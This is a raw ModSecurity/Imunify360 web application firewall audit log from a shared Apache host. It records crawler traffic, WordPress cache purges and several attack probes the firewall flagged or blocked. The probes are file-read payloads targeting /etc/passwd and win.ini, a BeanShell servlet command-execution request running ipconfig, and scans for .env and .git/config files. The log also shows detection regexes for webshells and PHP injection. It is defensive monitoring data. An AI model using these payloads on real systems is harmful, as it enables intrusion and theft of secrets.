Server: Apache Engine-Mode: "ENABLED" --89a2672c-Z-- --69c4ef43-A-- [30/Jun/2025:09:14:05.820916 +0530] aGIIBbwQtsH0h1Yz_tDZWAAAAA8 47.128.125.103 23202 192.168.74.40 443 --69c4ef43-B-- GET /robots.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Host: vervemedia.co.in Connection: close Accept-Encoding: gzip --69c4ef43-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --69c4ef43-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "433"] [id "77350374"] [msg "IM360 WAF: Scan attempt by bytespider crawler||UA:Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255044858505 1042245 (- - -) Stopwatch2: 1751255044858505 1042245; combined=4039, p1=92, p2=3673, p3=92, p4=5, p5=177, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --40604a68-Z-- --328bec3f-A-- [30/Jun/2025:09:14:06.925924 +0530] aGIIBSbPFSbCXNukAJI9KQAAAA0 103.185.74.40 12439 192.168.74.40 443 --328bec3f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --328bec3f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --328bec3f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255045571089 1355147 (- - -) Stopwatch2: 1751255045571089 1355147; combined=2179, p1=102, p2=1869, p3=0, p4=0, p5=207, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --328bec3f-Z-- --ca67db7c-A-- [30/Jun/2025:09:14:19.569099 +0530] aGIIEYZe6BrErBtdaID6pgAAAA4 66.249.65.192 48220 192.168.74.40 443 --ca67db7c-B-- GET /pcmypage?callback=/product%2Fdetail%2jp-auction-n1146891013 HTTP/1.1 Host: hypertechindia.com AMP-Cache-Transform: google;v="1..8" Connection: keep-alive Accept: text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --ca67db7c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --905fe332-Z-- --0baa815f-A-- [30/Jun/2025:09:31:12.864788 +0530] aGIMCJTOg5MfBu0aUg_c_AAAADQ 42.200.231.141 42836 192.168.74.40 443 --0baa815f-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Connection: close Content-Length: 42 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --0baa815f-C-- var={"body":{"file":"file:///etc/passwd"}} --0baa815f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --0baa815f-H-- Message: Matched phrase "etc/passwd" at MATCHED_VAR. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "133"] [id "77350504"] [msg "IM360 WAF: Block System File Attempt||MV:{\"body\":{\"file\":\"file:/etc/passwd\"}}||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256072798301 67115 (- - -) Stopwatch2: 1751256072798301 67115; combined=9932, p1=99, p2=9428, p3=0, p4=0, p5=405, sr=44, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0baa815f-Z-- --4ceb8755-A-- [30/Jun/2025:09:31:13.883290 +0530] aGIMCYECgiNvMI54GiFKfgAAADY 42.200.231.141 42848 192.168.74.40 443 --4ceb8755-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36 Connection: close Content-Length: 51 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --4ceb8755-C-- var={"body":{"file":"file:///c://windows/win.ini"}} --4ceb8755-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4ceb8755-H-- Message: Matched phrase "/windows/win.ini" at MATCHED_VAR. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "133"] [id "77350504"] [msg "IM360 WAF: Block System File Attempt||MV:{\"body\":{\"file\":\"file:/c:/windows/win.ini\"}}||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256073822177 61652 (- - -) Stopwatch2: 1751256073822177 61652; combined=10403, p1=253, p2=9882, p3=0, p4=0, p5=267, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4ceb8755-Z-- --66643e08-A-- [30/Jun/2025:09:31:15.232130 +0530] aGIMC45tNbv-LxmFmes0qQAAADI 20.171.207.232 50728 192.168.74.40 443 --66643e08-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --66643e08-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --66643e08-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d2a0dd75-Z-- --6d550f6b-A-- [30/Jun/2025:09:39:05.118467 +0530] aGIN4dvXAFtPKE3DkVonQAAAAAc 157.245.2.32 49906 192.168.74.40 80 --6d550f6b-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --6d550f6b-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --6d550f6b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751256545113625 5115 (- - -) Stopwatch2: 1751256545113625 5115; combined=1420, p1=111, p2=744, p3=0, p4=0, p5=564, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6d550f6b-Z-- --b677e61c-A-- [30/Jun/2025:09:39:05.603143 +0530] aGIN4XA6NpcWHkSi5ycXRQAAAAk 157.245.2.32 49910 192.168.74.40 80 --b677e61c-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --b677e61c-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --b677e61c-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751256545595501 9093 (- - -) Stopwatch2: 1751256545595501 9093; combined=3859, p1=129, p2=3589, p3=0, p4=0, p5=141, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b677e61c-Z-- --f381cd3a-A-- [30/Jun/2025:09:39:05.713836 +0530] aGIN4ZY3BQQPzTEhox5ZFQAAABk 20.171.207.232 36034 192.168.74.40 443 --f381cd3a-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f381cd3a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f381cd3a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256545699253 14723 (- - -) Stopwatch2: 1751256545699253 14723; combined=2880, p1=150, p2=2556, p3=0, p4=0, p5=173, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257652782816 15791 (- - -) Stopwatch2: 1751257652782816 15791; combined=3399, p1=155, p2=3077, p3=0, p4=0, p5=166, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --82e7471c-Z-- --8046006b-A-- [30/Jun/2025:09:57:40.039299 +0530] aGISOMfK7p-SoJnlbY18qAAAAD4 103.185.74.40 59716 192.168.74.40 443 --8046006b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8046006b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8046006b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257656627260 3412638 (- - -) Stopwatch2: 1751257656627260 3412638; combined=2793, p1=102, p2=2489, p3=0, p4=0, p5=202, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8046006b-Z-- --c8676b72-A-- [30/Jun/2025:09:57:41.267096 +0530] aGISPH1xkoRk4yPmuPgWJgAAAAk 103.185.74.40 30968 192.168.74.40 443 --c8676b72-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --c8676b72-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c8676b72-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257660250282 1017449 (- - -) Stopwatch2: 1751257660250282 1017449; combined=2245, p1=84, p2=1871, p3=0, p4=0, p5=290, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c8676b72-Z-- --a3e44125-A-- [30/Jun/2025:09:57:47.486614 +0530] aGISQye-Wd2kx1Cpb27HxQAAACM 152.59.61.103 39880 192.168.74.40 443 --a3e44125-B-- GET /js/masterslider/style/style.php?id=g4enhnz4xh5oteh3lzzkt HTTP/1.1 Host: sbagritech.com Connection: keep-alive sec-ch-ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116" sec-ch-ua-mobile: ?1 User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36 sec-ch-ua-platform: "Android" Accept: */* Sec-Fetch-Site: same-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --22b45e1c-Z-- --3582b244-A-- [30/Jun/2025:10:00:20.024169 +0530] aGIS26UriY3cDinrmcZKKwAAACA 45.95.242.45 49196 192.168.74.40 443 --3582b244-B-- POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 Connection: close Content-Length: 28 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --3582b244-C-- bsh.script=exec("ipconfig"); --3582b244-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3582b244-H-- Message: Pattern match "(?i)\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:bsh.script. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "53"] [id "77134464"] [msg "IM360 WAF: Infectors: PHP Injection High-Risk PHP Function||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/servlet||"] [severity "DEBUG"] [tag "service_im360"] Message: Pattern match "(?:print|echo|eval|exec)\\(" at ARGS:bsh.script. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "91"] [id "77140881"] [msg "IM360 WAF: Infectors: Arbitrary code execution vulnerability in Request URI||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/servlet||"] [severity "DEBUG"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257819450218 574553 (- - -) Stopwatch2: 1751257819450218 574553; combined=12138, p1=177, p2=11507, p3=0, p4=0, p5=453, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3582b244-Z-- --4f76852d-A-- [30/Jun/2025:10:00:21.021578 +0530] aGIS2bjSWQmDwo1nsoZ8XQAAADQ 66.249.65.99 44331 192.168.74.40 443 --4f76852d-B-- POST /wp-admin/admin-ajax.php HTTP/1.1 Accept-Language: en-US Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://miribooks.com Referer: https://miribooks.com/ X-Requested-With: XMLHttpRequest Host: miribooks.com Content-Length: 42 Connection: keep-alive Accept: text/html,*/*; q=0.01 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --4f76852d-C-- action=fusion_form_update_view&form_id=767 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258424715779 15963 (- - -) Stopwatch2: 1751258424715779 15963; combined=3854, p1=156, p2=3562, p3=0, p4=0, p5=135, sr=73, sw=1, l=0, gc=0 
Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1bd2c25e-Z-- --a2e9603c-A-- [30/Jun/2025:10:10:34.091049 +0530] aGIVQa93DG-_wCJ5q2B93AAAAAE 103.185.74.40 38930 192.168.74.40 443 --a2e9603c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --a2e9603c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a2e9603c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258433014706 1076857 (- - -) Stopwatch2: 1751258433014706 1076857; combined=2238, p1=86, p2=2005, p3=0, p4=0, p5=147, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a2e9603c-Z-- --f7fe6035-A-- [30/Jun/2025:10:10:36.004209 +0530] aGIVQgIHzUcQ0in2Eaf3bAAAACo 103.185.74.40 23898 192.168.74.40 443 --f7fe6035-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f7fe6035-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f7fe6035-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258434310189 1694499 (- - -) Stopwatch2: 1751258434310189 1694499; combined=3104, p1=116, p2=2778, p3=0, p4=0, p5=209, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f7fe6035-Z-- --511c1e0a-A-- [30/Jun/2025:10:10:38.536042 +0530] aGIVRjdfMoxrd6oJm5jicgAAAEU 43.156.202.34 47402 192.168.74.40 80 --511c1e0a-B-- GET / HTTP/1.1 Host: fastcrowwholesale.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258658807100 17929 (- - -) Stopwatch2: 1751258658807100 17929; combined=4227, p1=168, p2=3823, p3=0, p4=0, p5=236, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d1722718-Z-- --66aa5b3e-A-- [30/Jun/2025:10:14:22.268951 +0530] aGIWJRzeZOcGeFSOIv5wLwAAACk 103.185.74.40 8765 192.168.74.40 443 --66aa5b3e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --66aa5b3e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --66aa5b3e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
